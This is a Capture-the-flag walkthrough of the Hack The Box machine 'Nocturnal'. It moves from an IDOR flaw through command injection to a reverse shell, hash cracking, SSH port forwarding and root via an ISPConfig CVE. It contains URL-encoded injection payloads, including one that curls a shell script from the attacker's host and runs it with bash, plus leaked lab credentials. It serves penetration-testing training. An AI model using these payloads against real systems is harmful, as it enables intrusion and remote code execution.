This is a hackthebox machine “Nocturnal” walkthough

Summary

`Nocturnal` is a medium-difficulty Linux machine demonstrating an IDOR vulnerability in a PHP web application, allowing access to other users' uploaded files. Credentials are retrieved to log in to the admin panel, where the application's source code is accessed. A command injection vulnerability is identified, providing a reverse shell as the `www-data` user. Password hashes are extracted from a SQLite database and cracked to obtain SSH access as the `tobias` user. Exploiting [CVE-2023–46818](https://nvd.nist.gov/vuln/detail/CVE-2023-46818) in the `ISPConfig` application grants remote command execution, leading to privilege escalation to the `root` user.

“Start The machine and Get The Target Machine IP Address”

Now, let’s just connect out attack machine or connect with openvpn client to get access to the machine.

After connecting with the vpn, we will get another IP Address starting from 10.10.x.x in tun0 interface, by default.

Here out Target IP Address is: 10.10.11.64

Now, using nmap we will scan for all opening ports. For this we will use the following command:

nmap -p- -T5 10.10.11.64

Explaination of the command:

• nmap: tool used for scanning.
• -p- : scan for all TCP ports (1 to 65535).
• -T5 : Increasing scanning speed (from range T1 to T5, where T1 is slowest and T5 is fastest and T3 is default).

We found total 2 open ports:

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Once we identified open ports, now lets scan for these two ports specifically, finding versions of running services and other information such as OS Detection.

From the above output we can see, that a website is running on a http port 80 on nginx 1.18.0 version. Also, its redirecting to http://nocturnal.htb

Now, let’s add the Target IP Address to the hosts file, so we can access the website directly via the domain name (nocturnal.htb). File Path: “/etc/hosts”

You can see, we have added entry to the hosts file, now let’s access the website.

Use can also review the source code of the website by right clicking on the website and clicking on “View page source” or by simply pressing “CTRL + u” on keyboard.

By Reviewing, we can find that the website has ‘register’ and ‘login’ functionality. Let’s register an account and then try to login it.

we have created account with username: teffie and password: teffie

Now, lets login. After login we got a page, which has file upload functionality. So, let’t try to upload any file.

When i uploaded a text file (.txt) it shows me the error message that shows:

“Invalid file type. pdf, doc, docx, xls, xlsx, odt are allowed.”

For now, let’s just try to upload any valid file specified here which are allowed and see what happens.

When I uploaded a file, now we can access it by clicking on it. Let’s click on it. When we click on the file, its starts downloading. That means, its sending a request, to check the request let’s open the page source.

We can see the link here requested using view.php with the url:’http://nocturnal.htb/view.php?username=teffie&page=shell.php.doc’

Here, we username parameter is passed in “GET” method request. we can try to change it, if it returns somethings interesting.

It showing User Not Found Error. We can enumerate it using ffuf. For that we will need a wordlist file containing usernames which can be found on seclists: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt

ffuf -w '/usr/share/wordlists/seclists/Usernames/Names/names.txt' -u 'http://nocturnal.htb/view.php?username=FUZZ&file=shell.php.doc' -H 'Cookie: PHPSESSID=vcdtk8so2i86fbrn3ps4t7lt62'

Copy the session cookie and use it in the ffuf because we are logged in currently and then requesting to the url (view.php), also note that the reponse size of the request containing wrong username in the url is: 2985, which can be confirmed from the image given below.

Let’s use filter reponse size (-fs 2985). From reviewing the output, we have found total 4 usernames, you can go through all of them, but let’s just open page with the username: amanda

After visiting the page, we can see there is a file called “privacy.odt” file. click on it and download the file, it can contain interesting data or information.

Let’s open the privacy.odt file and review it. By opening it, we have found multiple files and folders. In Thumbnails folder, there is an image: thumbnail.png which is an image of a letter for amanda in which the password is mentioned for amanda. But we can also find it inside the content.xml file shown in below image.

We have found password for amanda: arHkG7HAI68X8s1J

Now, let’s login on the web portal using the amanda user. And we got the admin panel.

From Here by clicking on the web page, we can see the source code of the all files present here. There is also interesting “Create Backup” functionality. Let’s use this to see if we found anything interesting.

By reviewing output of the backup, we can see, it is almost similar to the output of ‘zip’ command which is used to build zip file. So, here we can assume that there should be a command of zip tool used with our given parameter password as there is a flag for adding password to the zip file using (-P) flag which is used to protect zip file with the password.

zip <backup-filename> admin.php register.php login.php index.php dashboard.php -P <password-parameter> 

So, we can try to put escape sequence characters for shell to escape the command and run another command with our given input (called Command-line Injection).

When reviewing source code of admin.php file using above functionality, we have found interesting function which is used to filter our input (password parameter) for taking backup.

That means we can’t use following characters: ‘;’ , ‘&’ , ‘|’ , ‘$’ , ‘ ‘ , ‘`’ , ‘{‘ , ‘}’ , ‘&&’, including whitespace, but we can use \n or \t which is newline or a tab, but we are requesting using GET method, so we have to use URL Encoding and send any command after escape sequence characters. Tab is shown as ‘%09' and newline is shown as ‘%0a’ in url encoding.

payload: password%0Acurl%09http://10.10.14.121

Here, %0a represents \n and then we have our command ‘curl’ command which we are using for requesting our local running server and start the server using following python command:

python3 -m http.server 80

Note: Here i have used “curl http://10.10.14.121” as original payload where the IP address is my tun0 interface IP address, which i got after connecting to the vpn, you may have different IP address.

After running server, now send the payload on password parameter and click on create backup. For this, you can try burpsuite or even curl for making the request.

Now, that we confirmed that we can get the connection let’s just run a payload to download reverse-shell file from our machine to target machine, then we will use curl to download the reverse-shell on target machine then run it to gain reverse-shell.

Once this payload will execute on target machine, it will return shell on our attack machine. Start netcat listener on port 4444 to receive back the connection.

URL-Encoded Payload: test%0Acurl%09http://10.10.14.121/shell%09-o%09shell%0A/bin/bash%09shell

Using Burpsuite for making request, you can even use curl.

After exploring a bit, i found database of the nocturnal.htb and found the password hashes, and try to login with the passwords with respect to users via ssh. I have marked the input i have put as command in the reverse-shell.

On crackstation website, we have found credentials, let’s try using one by one, with their respective usernames.

We successfuly logged in using username: “tobias ”and password: “slowmotionapocalypse”

Found user flag in home directory of the tobias user: 6cd940e6f66584666eec1193396e1da9

After exploring other functionalities and files and directories for elevating privilege on the target machine, i found that the target machine is running local server on part 8080. we can check that using command “ss” or “netstat”.

I have curled that server and got positive response. Which means server is running but we can’t directly access it from our attacker machine’s browser, if somehow we can manage to access directly from our attack machine, then our workload will reduce a bit.

There is a way of doing that: Port Forwarding

By using Port Forwarding we can redirect the traffic from one remote port to another local port. So, we can only access the target machine’s port 80, as the main webserver (nginx) is currently running on the nocturnal.htb. Also if you try accessing the internal running server using port 8080 you won’t get positive response.

Syntax for port forwarding:
ssh -L [local_port]:[remote_host]:[remote_port] user@ssh_server
Actual payload:
ssh -L 8081:127.0.0.1:8080 -N -vv [email protected]

now let’s try this out.

By using above payload, we are saying to the machine that forward all traffic of “127.0.0.1:8080” of the SSH host “[email protected]” on our localhost port 8081.

Now, let’s visit the website on our browser and see what does internal server have?

We found another login panel, but we have multiple credentials found from our nocturnal.htb database (SqliteDB).

By using username: admin and password: slowmotionapocalypse, we can login.

We found the ISPConfig is running on version 3.2.10p1 which is vulnerable to CVE-2023–46818. We can download the exploit from the github: https://github.com/ajdumanhug/CVE-2023-46818

Download the exploit and run it using python.

Exploited the vulnerability and got the root shell. Afterwards, we can find the root flag at /root/root.txt.

ANSWERS